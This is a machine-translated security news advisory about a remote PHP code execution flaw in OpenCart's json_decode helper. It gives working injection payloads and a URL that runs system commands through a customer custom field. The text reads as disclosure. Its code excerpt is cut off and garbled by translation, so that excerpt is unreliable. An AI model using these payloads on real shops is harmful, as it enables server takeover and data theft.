2016-04-12 14:12:56 Source: 360 Security Broadcast author: Dark Feather Meow read: 103 plays
Share to:
Recently, security researcher Naser Farhadi (Twitter: @naserfarhadi) found that there was a remote PHP code execution vulnerability in OpenCart json_decode function, involving a version of 2.1.0.2 to 2.2.0.0 (latest version)
The vulnerability exists in/upload/system/helper/json.php, where the code
#/upload/system/helper/json.php$match = '/'. *? (?
Where the function is created through JSON, and the Json_decode function can be exploited
Here are a few simple test examples
Var_dump (Json_decode (' {"OK": "1". " 2 "." 3 "} '));
Var_dump (Json_decode (' {"OK": "$_server[http_user_agent]"} '));
Var_dump (Json_decode (' {"OK": "{$_get[b] ($_get[c])}"} ");
In real-world scenarios, it can be exploited through/index.php?route=account/edit
For example, $_server[http_user_agent] as the name of the fill in, save (need to repeat two times)
Then when the administrator accesses the admin panel, he will see his own useragent in the place where he should have displayed your name in the recent activity
Another example is the Custom_field in Account/edit or Account/register, where the use may be the most appropriate
If the administrator adds a custom zone to the/admin/index.php?route=customer/custom_field for additional information such as phone numbers
You can inject your code directly into this Custom_field.
For example, {$_get[b] ($_get[c])} is filled in this Custom_field, save
Then visit
Http://host/shop_directory/index.php?route=account/edit&b=system&c=ls
You'll see that the code is executed correctly.
It is important to note that this usage will only work if the PHP JSON extension is not installed
This article by 360 security broadcast translation, reprint please specify "Transfer from 360 security broadcast", and attached link.
Original link: http://seclists.org/bugtraq/2016/Apr/61